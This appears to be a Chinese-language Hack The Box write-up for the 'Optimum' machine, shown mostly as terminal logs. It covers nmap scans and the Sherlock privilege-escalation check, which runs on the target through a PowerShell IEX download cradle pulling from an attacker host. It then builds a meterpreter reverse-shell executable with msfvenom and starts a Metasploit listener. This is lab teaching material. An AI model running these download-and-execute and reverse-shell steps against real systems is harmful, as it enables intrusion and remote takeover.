┌──(kali㉿kali)-[~] └─$ nmap -p- --min-rate 10000 10.10.10.8 Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-22 07:09 EDT Nmap scan report for 10.10.10.8 Host is up (0.28s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 47.19 seconds
根据开放端口,进行详细信息扫描。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -p 80 10.10.10.8 Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-22 07:12 EDT Nmap scan report for 10.10.10.8 Host is up (0.28s latency).
PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds
┌──(kali㉿kali)-[~/Documents/htb/Optimum/Sherlock] └─$ grep -i function Sherlock.ps1 function Get-FileVersionInfo ($FilePath) { function Get-InstalledSoftware($SoftwareName) { function Get-Architecture { function Get-CPUCoreCount { function New-ExploitTable { function Set-ExploitTable ($MSBulletin, $VulnStatus) { function Get-Results { function Find-AllVulns { function Find-MS10015 { function Find-MS10092 { function Find-MS13053 { function Find-MS13081 { function Find-MS14058 { function Find-MS15051 { function Find-MS15078 { function Find-MS16016 { function Find-MS16032 { function Find-MS16034 { function Find-CVE20177199 { function Find-MS16135 {
PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.14/Sherlock.ps1') Title : User Mode to Ring (KiTrap0D) MSBulletin : MS10-015 CVEID : 2010-0232 Link : https://www.exploit-db.com/exploits/11199/ VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML MSBulletin : MS10-092 CVEID : 2010-3338, 2010-3888 Link : https://www.exploit-db.com/exploits/19930/ VulnStatus : Not Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow MSBulletin : MS13-053 CVEID : 2013-1300 Link : https://www.exploit-db.com/exploits/33213/ VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page MSBulletin : MS13-081 CVEID : 2013-3881 Link : https://www.exploit-db.com/exploits/31576/ VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference MSBulletin : MS14-058 CVEID : 2014-4113 Link : https://www.exploit-db.com/exploits/35101/ VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k MSBulletin : MS15-051 CVEID : 2015-1701, 2015-2433 Link : https://www.exploit-db.com/exploits/37367/ VulnStatus : Not Vulnerable
Title : Font Driver Buffer Overflow MSBulletin : MS15-078 CVEID : 2015-2426, 2015-2433 Link : https://www.exploit-db.com/exploits/38222/ VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV MSBulletin : MS16-016 CVEID : 2016-0051 Link : https://www.exploit-db.com/exploits/40085/ VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle MSBulletin : MS16-032 CVEID : 2016-0099 Link : https://www.exploit-db.com/exploits/39719/ VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP MSBulletin : MS16-034 CVEID : 2016-0093/94/95/96 Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034? VulnStatus : Appears Vulnerable
Title : Win32k Elevation of Privilege MSBulletin : MS16-135 CVEID : 2016-7255 Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135 VulnStatus : Appears Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3 MSBulletin : N/A CVEID : 2017-7199 Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html VulnStatus : Not Vulnerable
┌──(kali㉿kali)-[~/Documents/htb/Optimum] └─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=3333 -f exe > shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes
通过msfconsole监听3333端口
1 2 3 4 5 6 7 8 9 10 11 12
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 10.10.14.14 lhost => 10.10.14.14 msf6 exploit(multi/handler) > set lport 3333 lport => 3333 msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.14:3333